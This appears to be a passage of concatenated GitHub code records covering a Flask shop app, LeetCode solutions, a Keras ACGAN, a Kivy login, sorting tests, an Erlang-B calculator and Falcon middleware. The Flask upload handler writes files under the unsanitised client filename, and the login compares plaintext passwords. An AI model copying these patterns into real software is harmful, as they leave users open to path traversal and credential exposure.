methods=['GET', 'POST'])\r\n@login_required\r\ndef shop(id):\r\n shop = db_sess.query(Shops).filter(Shops.id == id).first()\r\n category = db_sess.query(Category)\r\n colors = db_sess.query(Colors)\r\n if request.method == 'POST':\r\n if request.form['hidden'].startswith('update'):\r\n return redirect(f'/add_product/{id}-{int(request.form[\"hidden\"].split()[1])}')\r\n product = db_sess.query(Products).filter(Products.id == request.form['hidden']).first()\r\n shop.products.remove(product)\r\n db_sess.delete(product)\r\n db_sess.commit()\r\n return redirect(f'/shop/{id}')\r\n return render_template('shop.html', title=f'Магазин {shop.title}', current_user=current_user,\r\n shop=shop, category=category, colors=colors, Category=Category, Colors=Colors)\r\n\r\n\r\n@user_api.route('/add_product/-', methods=['GET', 'POST'])\r\n@user_api.route('/add_product/', methods=['GET', 'POST'], defaults={'id_prod': -1})\r\n@login_required\r\ndef add_product(id, id_prod):\r\n form = ProductForm()\r\n shop = db_sess.query(Shops).filter(Shops.id == id).first()\r\n category = db_sess.query(Category)\r\n colors = db_sess.query(Colors)\r\n if id_prod == -1:\r\n title = 'Добавление товара'\r\n product = Products()\r\n db_sess.commit()\r\n else:\r\n title = 'Редактирование товара'\r\n product = db_sess.query(Products).filter(Products.id == id_prod).first()\r\n if form.validate_on_submit():\r\n category = category.filter(Category.name == form.category.data).first()\r\n color = colors.filter(Colors.name == form.color.data).first()\r\n product.title = form.title.data.lower()\r\n product.category = category.id\r\n product.color = color.id\r\n product.shop = id\r\n product.price = form.price.data\r\n product.about = form.about.data\r\n product.rating, product.count = 0, 0\r\n if form.image.data.filename:\r\n f = form.image.data\r\n with open(os.path.abspath(os.path.join(os.path.dirname('static/img'), 'img', f.filename)), 'wb') as file:\r\n file.write(f.read())\r\n product.image = f'../static/img/{f.filename}'\r\n else:\r\n product.image = '../static/img/none.png'\r\n db_sess.add(product)\r\n db_sess.commit()\r\n shop.products.append(product)\r\n db_sess.commit()\r\n return redirect(f'/shop/{id}')\r\n return render_template('add_product.html', title=title,\r\n form=form, current_user=current_user, product=product,\r\n colors=colors, category=category,\r\n Colors=Colors, Category=Category)","repo_name":"FrogFairy/web-project","sub_path":"data/user_api.py","file_name":"user_api.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4089459933","text":"N, K = map(int, input().split())\nfrom collections import deque\ndeq = deque([i+1 for i in range(N)])\njosephus = []\nwhile len(deq) != 0:\n for i in range(K-1):\n a = deq.popleft()\n deq.append(a)\n josephus.append(str(deq.popleft()))\nprint(f\"<{', '.join(josephus)}>\")\n","repo_name":"STR-HK/BOJ","sub_path":"class/2/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37284716295","text":"class Solution(object):\n def findWords(self, words):\n mappings={\n 1:'qwertyuiop',\n 2:\"asdfghjkl\",\n 3:\"zxcvbnm\"\n }\n flag=True\n res=[]\n for word in words:\n wordTemp=word.lower()\n if wordTemp[0] in mappings[1]:\n location=1\n elif wordTemp[0] in mappings[2]:\n location=2\n else:\n location=3\n for ch in wordTemp:\n if ch not in mappings[location]:\n flag=False\n break\n if flag:\n res.append(word)\n flag=True\n return res\n\n\ns=Solution()\nprint(s.findWords([\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]))","repo_name":"jiangshshui/leetcode","sub_path":"tenthPage/KeyboardRow_500.py","file_name":"KeyboardRow_500.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69878276587","text":"class Solution:\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n return self.dp(cost, len(cost), {0: 0, 1: 0})\n\n def dp(self, cost, index, memo):\n if index in memo:\n return memo[index]\n else:\n memo[index] = min(self.dp(cost, index - 1, memo) + cost[index - 1],\n self.dp(cost, index - 2, memo) + cost[index - 2])\n return memo[index]\n\n\ncost = [1, 100, 1, 1, 1, 100, 1, 1, 100, 1]\ns = Solution()\nprint(s.minCostClimbingStairs(cost))\n","repo_name":"hotheat/LeetCode","sub_path":"746. Min Cost Climbing Stairs/746.py","file_name":"746.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7931210267","text":"import unittest\n\nfrom fastapi.testclient import TestClient\n\nfrom api_models import PredictionItem\nfrom main import app, PredictProbaResponse\nfrom modelresolver import ModelResolver\n\n\nclass TestModelResolver(unittest.TestCase):\n \"\"\"\n Test class for the model resolver which tests loading and predictions\n \"\"\"\n resolver = ModelResolver()\n\n def test_get_model(self):\n self.assertTrue(self.resolver.get_model(\"lr\", \"style\"))\n\n def test_le_classes(self):\n self.assertTrue(self.resolver.encoders)\n self.assertGreater(len(self.resolver.encoders[-1].classes_), 0)\n\n def test_model_prediction(self):\n response = self.resolver.predict(model_name=\"lr\",\n data=\"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n model_type=\"style\")\n self.assertTrue(response.name == \"greek\")\n self.assertTrue(response.probability >= 0.90)\n\n def test_model_prediction_proba(self):\n response = self.resolver.predict_proba(model_name=\"lr\",\n data=\"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n model_type=\"style\")\n\n greek_filter_iter = filter(lambda x: x.name == \"greek\", response)\n assert next(greek_filter_iter, ).probability > 0.90\n\n def test_model_prediction_proba_allergen(self):\n response = self.resolver.predict_proba(model_name=\"lr\",\n data=\"niacin, contains or less of wheat gluten, yeast, cul, folic acid, reduced iron, water, thiamin mononitrate, unbleached enriched flour wheat flour, sugar, wheat flour, salt, barley malt flour, cultured corn syrup solids, distilled vinegar, riboflavin\",\n model_type=\"allergens\")\n\n gluten_filter_iter = filter(lambda x: x.name == \"gluten\", response)\n assert next(gluten_filter_iter, ).probability > 0.90\n\n\nclass TestRestApi(unittest.TestCase):\n \"\"\"\n Test class for RestApi\n \"\"\"\n client = TestClient(app)\n\n def test_read_main(self):\n response = self.client.get(\"/\")\n assert response.status_code == 200\n assert response.json() == {\"msg\": \"Hello World\"}\n\n def test_read_predict(self):\n response = self.client.post(\"/predict_style\",\n json={\"data\": \"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n \"model\": \"lr\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictionItem(**response.json())\n\n assert predict_response.name == \"greek\"\n assert predict_response.probability > 0.90\n\n def test_read_predict_proba(self):\n response = self.client.post(\"/predict_proba\",\n json={\"data\": \"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n \"model\": \"lr\",\n \"type\": \"style\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictProbaResponse(**response.json())\n greek_filter_iter = filter(lambda x: x.name == \"greek\", predict_response.predictions)\n\n assert len(predict_response.predictions) > 1\n assert next(greek_filter_iter, ).probability > 0.90\n\n def test_read_predict_proba_allergens(self):\n response = self.client.post(\"/predict_proba\",\n json={\"data\": \"niacin, contains or less of wheat gluten, yeast, cul, folic acid, reduced iron, water, thiamin mononitrate, unbleached enriched flour wheat flour, sugar, wheat flour, salt, barley malt flour, cultured corn syrup solids, distilled vinegar, riboflavins\",\n \"model\": \"lr\",\n \"type\": \"allergens\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictProbaResponse(**response.json())\n gluten_filter_iter = filter(lambda x: x.name == \"gluten\", predict_response.predictions)\n\n assert len(predict_response.predictions) > 1\n assert next(gluten_filter_iter, ).probability > 0.90\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AndreasRoither/system-for-allergen-and-style-classification","sub_path":"ModelRestApi/src/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6577336115","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nfile: ACGAN - CIFAR10.py\r\nauthor: Luke\r\nde\r\nOliveira(lukedeo @ vaitech.io)\r\ncontributor: KnightTuYa(398225157 @ qq.com)\r\nConsult\r\nhttps: // github.com / lukedeo / keras - acgan\r\nfor MNIST version!\r\nConsult\r\nhttps: // github.com / soumith / ganhacks\r\nfor GAN trick!\r\nI directly use Minibatch Layer Code from:\r\nhttps://github.com/forcecore/Keras-GAN-Animeface-Character\r\nThanks for the great work!\r\nI am still not satisfied with the generated images yet, Any suggestion is welcomed!\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport os\r\nfrom collections import defaultdict\r\n\r\ntry:\r\n import cPickle as pickle\r\nexcept ImportError:\r\n import pickle\r\nfrom PIL import Image\r\nfrom six.moves import range\r\nimport keras.backend as K\r\nfrom keras.datasets import cifar10\r\nfrom keras import layers\r\nfrom keras.layers import Input, Dense, Reshape, Flatten, Embedding, Dropout, BatchNormalization\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.layers.convolutional import Conv2DTranspose, Conv2D\r\nfrom keras.models import Sequential, Model\r\nfrom keras.optimizers import Adam\r\nfrom keras.initializers import TruncatedNormal\r\nfrom keras.utils.generic_utils import Progbar\r\nfrom Minibatch import MinibatchDiscrimination\r\nimport matplotlib.pyplot as plt\r\nfrom keras.layers.noise import GaussianNoise\r\nimport numpy as np\r\n\r\nnp.random.seed(1337)\r\nclass_num = 10\r\nK.set_image_dim_ordering('th')\r\npath = \"images\" # The path to store the generated images\r\nload_weight = False\r\n# Set True if you need to reload weight\r\nload_epoch = 100 # Decide which epoch to reload weight, please check your file name\r\n\r\ndef build_generator(latent_size):\r\n # we will map a pair of (z, L), where z is a latent vector and L is a\r\n # label drawn from P_c, to image space (..., 3, 32, 32)\r\n cnn = Sequential()\r\n cnn.add(Dense(384 * 4 * 4, input_dim=latent_size, activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(Reshape((384, 4, 4)))\r\n\r\n cnn.add(Conv2DTranspose(192, kernel_size=5, strides=2, padding='same', activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n\r\n cnn.add(Conv2DTranspose(96, kernel_size=5, strides=2, padding='same', activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n\r\n cnn.add(Conv2DTranspose(3, kernel_size=5, strides=2, padding='same', activation='tanh',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n\r\n # this is the z space commonly refered to in GAN papers\r\n latent = Input(shape=(latent_size,))\r\n\r\n # this will be our label\r\n image_class = Input(shape=(1,), dtype='int32')\r\n\r\n # 10 classes in CIFAR-10\r\n cls = Flatten()(Embedding(10, latent_size,\r\n embeddings_initializer='glorot_normal')(image_class))\r\n\r\n # hadamard product between z-space and a class conditional embedding\r\n h = layers.multiply([latent, cls])\r\n\r\n fake_image = cnn(h)\r\n\r\n return Model([latent, image_class], fake_image)\r\n\r\n\r\ndef build_discriminator():\r\n # build a relatively standard conv net, with LeakyReLUs as suggested in\r\n # the reference paper\r\n cnn = Sequential()\r\n\r\n cnn.add(GaussianNoise(0.05, input_shape=(3, 32, 32))) # Add this layer to prevent D from overfitting!\r\n\r\n cnn.add(Conv2D(16, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(32, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(64, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(128, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(256, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(512, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Flatten())\r\n\r\n cnn.add(MinibatchDiscrimination(50, 30))\r\n\r\n image = Input(shape=(3, 32, 32))\r\n\r\n features = cnn(image)\r\n\r\n # first output (name=generation) is whether or not the discriminator\r\n # thinks the image that is being shown is fake, and the second output\r\n # (name=auxiliary) is the class that the discriminator thinks the image\r\n # belongs to.\r\n fake = Dense(1, activation='sigmoid', name='generation',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros')(features)\r\n aux = Dense(class_num, activation='softmax', name='auxiliary',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros')(features)\r\n\r\n return Model(image, [fake, aux])\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # batch and latent size taken from the paper\r\n nb_epochs = 1000\r\n batch_size = 100\r\n latent_size = 110\r\n\r\n # Adam parameters suggested in https://arxiv.org/abs/1511.06434\r\n adam_lr = 0.0002\r\n adam_beta_1 = 0.5\r\n\r\n # build the discriminator, Choose Adam as optimizer according to GANHACK\r\n discriminator = build_discriminator()\r\n discriminator.compile(\r\n optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),\r\n loss=['binary_crossentropy', 'sparse_categorical_crossentropy']\r\n )\r\n generator = build_generator(latent_size)\r\n\r\n latent = Input(shape=(latent_size,))\r\n image_class = Input(shape=(1,), dtype='int32')\r\n\r\n # get a fake image\r\n fake = generator([latent, image_class])\r\n\r\n # we only want to be able to train generator for the combined model\r\n discriminator.trainable = False\r\n fake, aux = discriminator(fake)\r\n combined = Model([latent, image_class], [fake, aux])\r\n\r\n combined.compile(\r\n optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),\r\n loss=['binary_crossentropy', 'sparse_categorical_crossentropy']\r\n )\r\n\r\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n X_train = (X_train.astype(np.float32) - 127.5) / 127.5\r\n X_test = (X_test.astype(np.float32) - 127.5) / 127.5\r\n nb_train, nb_test = X_train.shape[0], X_test.shape[0]\r\n\r\n train_history = defaultdict(list)\r\n test_history = defaultdict(list)\r\n\r\n if load_weight:\r\n generator.load_weights('params_generator_epoch_{0:03d}.hdf5'.format(load_epoch))\r\n discriminator.load_weights('params_discriminator_epoch_{0:03d}.hdf5'.format(load_epoch))\r\n else:\r\n load_epoch = 0\r\n\r\n for epoch in range(nb_epochs):\r\n print('Epoch {} of {}'.format(load_epoch + 1, nb_epochs))\r\n load_epoch += 1\r\n nb_batches = int(X_train.shape[0] / batch_size)\r\n progress_bar = Progbar(target=nb_batches)\r\n\r\n epoch_gen_loss = []\r\n epoch_disc_loss = []\r\n\r\n for index in range(nb_batches):\r\n progress_bar.update(index)\r\n # generate a new batch of noise\r\n noise = np.random.normal(0, 0.5, (batch_size, latent_size))\r\n\r\n # get a batch of real images\r\n image_batch = X_train[index * batch_size:(index + 1) * batch_size]\r\n label_batch = y_train[index * batch_size:(index + 1) * batch_size]\r\n\r\n # sample some labels from p_c\r\n sampled_labels = np.random.randint(0, class_num, batch_size)\r\n\r\n # generate a batch of fake images, using the generated labels as a\r\n # conditioner. We reshape the sampled labels to be\r\n # (batch_size, 1) so that we can feed them into the embedding\r\n # layer as a length one sequence\r\n generated_images = generator.predict(\r\n [noise, sampled_labels.reshape((-1, 1))], verbose=0)\r\n\r\n disc_real_weight = [np.ones(batch_size), 2 * np.ones(batch_size)]\r\n disc_fake_weight = [np.ones(batch_size), np.zeros(batch_size)]\r\n\r\n # According to GANHACK, We training our ACGAN-CIFAR10 in Real->D, Fake->D,\r\n # Noise->G, rather than traditional method: [Real, Fake]->D, Noise->G, actully,\r\n # it really make sense!\r\n\r\n for train_ix in range(3):\r\n if index % 30 != 0:\r\n X_real = image_batch\r\n # Label Soomthing\r\n y_real = np.random.uniform(0.7, 1.2, size=(batch_size,))\r\n aux_y1 = label_batch.reshape(-1, )\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_real, [y_real, aux_y1]))\r\n # Label Soomthing\r\n X_fake = generated_images\r\n y_fake = np.random.uniform(0.0, 0.3, size=(batch_size,))\r\n aux_y2 = sampled_labels\r\n\r\n # see if the discriminator can figure itself out...\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_fake, [y_fake, aux_y2]))\r\n else:\r\n # make the labels the noisy for the discriminator: occasionally flip the labels\r\n # when training the discriminator\r\n X_real = image_batch\r\n y_real = np.random.uniform(0.0, 0.3, size=(batch_size,))\r\n aux_y1 = label_batch.reshape(-1, )\r\n\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_real, [y_real, aux_y1]))\r\n # Label Soomthing\r\n X_fake = generated_images\r\n y_fake = np.random.uniform(0.7, 1.2, size=(batch_size,))\r\n aux_y2 = sampled_labels\r\n\r\n # see if the discriminator can figure itself out...\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_fake, [y_fake, aux_y2]))\r\n # make new noise. we generate Guassian Noise rather than Uniform Noise according to GANHACK\r\n noise = np.random.normal(0, 0.5, (2 * batch_size, latent_size))\r\n sampled_labels = np.random.randint(0, class_num, 2 * batch_size)\r\n\r\n # we want to train the generator to trick the discriminator\r\n # For the generator, we want all the {fake, not-fake} labels to say\r\n # not-fake\r\n trick = np.random.uniform(0.7, 1.2, size=(2 * batch_size,))\r\n\r\n epoch_gen_loss.append(combined.train_on_batch(\r\n [noise, sampled_labels.reshape((-1, 1))], [trick, sampled_labels]))\r\n\r\n print('\\nTesting for epoch {}:'.format(load_epoch))\r\n\r\n # evaluate the testing loss here\r\n\r\n # generate a new batch of noise\r\n noise = np.random.normal(0, 0.5, (nb_test, latent_size))\r\n\r\n # sample some labels from p_c and generate images from them\r\n sampled_labels = np.random.randint(0, class_num, nb_test)\r\n generated_images = generator.predict(\r\n [noise, sampled_labels.reshape((-1, 1))], verbose=False)\r\n\r\n X = np.concatenate((X_test, generated_images))\r\n y = np.array([1] * nb_test + [0] * nb_test)\r\n aux_y = np.concatenate((y_test.reshape(-1, ), sampled_labels), axis=0)\r\n\r\n # see if the discriminator can figure itself out...\r\n discriminator_test_loss = discriminator.evaluate(\r\n X, [y, aux_y], verbose=False)\r\n\r\n discriminator_train_loss = np.mean(np.array(epoch_disc_loss), axis=0)\r\n\r\n # make new noise\r\n noise = np.random.normal(0, 0.5, (2 * nb_test, latent_size))\r\n sampled_labels = np.random.randint(0, class_num, 2 * nb_test)\r\n trick = np.ones(2 * nb_test)\r\n generator_test_loss = combined.evaluate(\r\n [noise, sampled_labels.reshape((-1, 1))],\r\n [trick, sampled_labels], verbose=False)\r\n\r\n generator_train_loss = np.mean(np.array(epoch_gen_loss), axis=0)\r\n\r\n # generate an epoch report on performance\r\n train_history['generator'].append(generator_train_loss)\r\n train_history['discriminator'].append(discriminator_train_loss)\r\n\r\n test_history['generator'].append(generator_test_loss)\r\n test_history['discriminator'].append(discriminator_test_loss)\r\n\r\n print('{0:<22s} | {1:4s} | {2:15s} | {3:5s}'.format(\r\n 'component', *discriminator.metrics_names))\r\n print('-' * 65)\r\n\r\n ROW_FMT = '{0:<22s} | {1:<4.2f} | {2:<15.2f} | {3:<5.2f}'\r\n print(ROW_FMT.format('generator (train)',\r\n *train_history['generator'][-1]))\r\n print(ROW_FMT.format('generator (test)',\r\n *test_history['generator'][-1]))\r\n print(ROW_FMT.format('discriminator (train)',\r\n *train_history['discriminator'][-1]))\r\n print(ROW_FMT.format('discriminator (test)',\r\n *test_history['discriminator'][-1]))\r\n\r\n # save weights every epoch\r\n generator.save_weights(\r\n 'params_generator_epoch_{0:03d}.hdf5'.format(load_epoch), True)\r\n discriminator.save_weights(\r\n 'params_discriminator_epoch_{0:03d}.hdf5'.format(load_epoch), True)\r\n\r\n # generate some pictures to display\r\n noise = np.random.normal(0, 0.5, (100, latent_size))\r\n sampled_labels = np.array([\r\n [i] * 10 for i in range(10)\r\n ]).reshape(-1, 1)\r\n generated_images = generator.predict([noise, sampled_labels]).transpose(0, 2, 3, 1)\r\n generated_images = np.asarray((generated_images * 127.5 + 127.5).astype(np.uint8))\r\n\r\n\r\n def vis_square(data, padsize=1, padval=0):\r\n\r\n # force the number of filters to be square\r\n n = int(np.ceil(np.sqrt(data.shape[0])))\r\n padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)\r\n data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))\r\n\r\n # tile the filters into an image\r\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\r\n data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])\r\n return data\r\n\r\n\r\n img = vis_square(generated_images)\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n Image.fromarray(img).save(\r\n 'images/plot_epoch_{0:03d}_generated.png'.format(load_epoch))\r\n\r\n pickle.dump({'train': train_history, 'test': test_history},\r\n open('acgan-history.pkl', 'wb'))\r\n","repo_name":"King-Of-Knights/Keras-ACGAN-CIFAR10","sub_path":"cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":15285,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"13907677419","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom MYSQL import *\nimport re\nfrom kivy.uix.image import AsyncImage\nfrom MYSQL import *\nBuilder.load_file('Kivy_file\\Login.kv')\n\nclass Login_Lay(Screen):\n\tdef Reg(self):\n\t\tuname=self.ids.uname.text\n\t\tpw=self.ids.pw.text\n\t\tif ( uname != \"\" and pw != \"\" ):\n\t\t\tif (re.match(\"^[a-zA-Z0-9_.-]+$\",uname)):\n\t\t\t\tresult=Check_PCE(\"persons\",uname)\n\t\t\t\tif not result:\n\t\t\t\t\tperson=Select_IC(\"persons\",uname)\n\t\t\t\t\t\n\t\t\t\t\tif person[2] == pw:\n\t\t\t\t\t\tself.manager.transition.direction = 'right'\n\t\t\t\t\t\tself.manager.current = 'Country'\n\t\t\t\t\t\t\n\t\telse :\t\n\t\t\tif (uname == \"\"):\n\t\t\t\tself.ids.uname.text=\"\"\n\t\t\t\tself.ids.uname.hint_text=\"You have not filled\"\n\t\t\t\tself.ids.uname.background_color=(1,0,0,1)\n\t\t\telse :\n\t\t\t\tself.ids.uname.background_color=(0,1,1,1)\n\t\t\tif (pw == \"\"):\n\t\t\t\tself.ids.pw.text=\"\"\n\t\t\t\tself.ids.pw.hint_text=\"You have not filled\"\n\t\t\t\tself.ids.pw.background_color=(1,0,0,1)\n\t\t\telse :\n\t\t\t\tself.ids.pw.background_color=(0,1,1,1)\t\n\t\t\t\t\n\tdef CA(self):\n \t\t#Page Create Account\n\t\t\tself.manager.transition.direction = 'up'\n\t\t\tself.manager.current = 'Create Account'\t\n\tdef RP(self):\n \t\t#Page Recover Account\n\t\t\tself.manager.transition.direction = 'down'\n\t\t\tself.manager.current = 'Recovery Password'\n\n\n# class Main(App):\n# \tWindow.size=(1380,780)\n# \tWindow.top = 100\n# \tWindow.left = 250\n# \ttitle=\" My Application\"\n# \tdef build(self):\n# \t\treturn Login_Lay()\n\n# Main().run()","repo_name":"mohandesinarmafzar1400/MP","sub_path":"Code/Pass/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23644880242","text":"\"\"\" 3: Sorting test file\r\n\r\n thomas moll 2015\r\n\"\"\"\r\n\r\nimport unittest\r\nimport sorting\r\n\r\nclass TestSortingMethods(unittest.TestCase):\r\n def setUp(self):\r\n self.unordered = [4,14,6,21,11,9,7,5]\r\n self.ordered = [4,5,6,7,9,11,14,21]\r\n self.unordered_with_dupes = [4,5,6,7,6,5,4,5]\r\n self.ordered_with_dupes = [4,4,5,5,5,6,6,7]\r\n\r\n def test_static_sorts(self):\r\n # Note: None of these methods should affect the original lists!\r\n original = self.unordered\r\n\r\n sorting.selection_sort(self.unordered)\r\n self.assertEqual(original, self.unordered)\r\n\r\n sorting.insertion_sort(self.unordered)\r\n self.assertEqual(original, self.unordered)\r\n\r\n sorting.merge_sort(self.unordered)\r\n self.assertEqual(original, self.unordered)\r\n\r\n def test_selection_sort(self):\r\n test = sorting.selection_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.selection_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_insertion_sort(self):\r\n test = sorting.insertion_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.insertion_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_merge_sort(self):\r\n test = sorting.merge_sort(self.unordered)\r\n self.assertEqual(test, self.ordered)\r\n\r\n test = sorting.merge_sort(self.unordered_with_dupes)\r\n self.assertEqual(test, self.ordered_with_dupes)\r\n\r\n def test_merge(self):\r\n # Note: merge works in O(n) time assuming that the two lists are SORTED\r\n num1 = [1,4,6,7,20]\r\n num2 = [2,5,9,23]\r\n orig1, orig2 = num1, num2\r\n ans = [1,2,4,5,6,7,9,20,23]\r\n\r\n test = sorting.merge(num1, num2)\r\n self.assertEqual(test, ans)\r\n\r\n self.assertEqual(orig1, num1)\r\n self.assertEqual(orig2, num2)\r\n\r\n def test_quick_sort(self):\r\n test = self.unordered\r\n test_with_dupes = self.unordered_with_dupes\r\n\r\n sorting.quick_sort(test, 0, len(test)-1)\r\n sorting.quick_sort(test_with_dupes, 0, len(test_with_dupes)-1)\r\n\r\n self.assertEqual(test, self.ordered)\r\n self.assertEqual(test_with_dupes, self.ordered_with_dupes)\r\n\r\n def test_partition(self):\r\n test = self.unordered\r\n ans = [4, 5, 6, 21, 11, 9, 7, 14]\r\n pivot_ans = 1\r\n\r\n pivot = sorting.partition(test, 0, len(test)-1)\r\n\r\n self.assertEqual(ans, test)\r\n self.assertEqual(pivot, pivot_ans)\r\n\r\nif __name__ == '__main__':\r\n unittest.main(verbosity=2)\r\n","repo_name":"QuantumFractal/Data-Structure-Zoo","sub_path":"2-Sorting/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"24527184164","text":"from plot.PlotProbability import Graph\n\n\nclass ErlangModelB:\n def __init__(self):\n self.memo = {}\n pass\n\n def __erlang_model_B(self, A, N):\n if N == 0:\n return 1\n elif self.memo.get(N):\n return self.memo[N]\n else:\n result = (A * self.__erlang_model_B(A, N - 1)) / (A * self.__erlang_model_B(A, N - 1) + N)\n self.memo[N] = result\n return result\n\n def __expand_amount_of_probes(self, array):\n first_value = array[0]\n last_value = array[1]\n position = 1\n for value in range(first_value + 1, last_value):\n array.insert(position, value)\n position += 1\n return array\n\n def calculate_probability_of_blocking(self, average_traffic, number_of_lines):\n probabilities_of_blocking = []\n x_values_for_plot = []\n x_axis_name = \"\"\n if isinstance(average_traffic, list):\n average_traffic = self.__expand_amount_of_probes(average_traffic)\n x_values_for_plot = average_traffic\n x_axis_name = \"Average traffic [Erlang]\"\n for traffic in average_traffic:\n self.memo = {}\n probability_of_blocking = round(self.__erlang_model_B(traffic, number_of_lines), 3)\n probabilities_of_blocking.append(probability_of_blocking)\n elif isinstance(number_of_lines, list):\n number_of_lines = self.__expand_amount_of_probes(number_of_lines)\n x_values_for_plot = number_of_lines\n x_axis_name = \"Number of lines\"\n for line in number_of_lines:\n probability_of_blocking = round(self.__erlang_model_B(average_traffic, line), 3)\n probabilities_of_blocking.append(probability_of_blocking)\n else:\n probability_of_blocking = round(self.__erlang_model_B(average_traffic, number_of_lines), 3)\n probabilities_of_blocking.append(probability_of_blocking)\n\n if x_values_for_plot:\n Graph(x_values_for_plot, x_axis_name, probabilities_of_blocking)\n return probabilities_of_blocking\n","repo_name":"MPogotsky/ErlangTrafficCalculator","sub_path":"src/ErlangModel.py","file_name":"ErlangModel.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71865194988","text":"import falcon\nimport httperrors as HTTP_ERRORS\nfrom bson import json_util\n\nclass Middleware(object):\n\n # Process the request before routing it.\n #def process_request(self, req, resp):\n # \n \n # Process the request after routing.\n def process_resource(self, req, resp, resource, params):\n if 'theCookie' not in req.cookies and not hasattr(resource, 'no_auth'):\n raise HTTP_ERRORS.HTTP_OK_ERROR('Cookie', 'No Cookie Provided')\n \n \n # 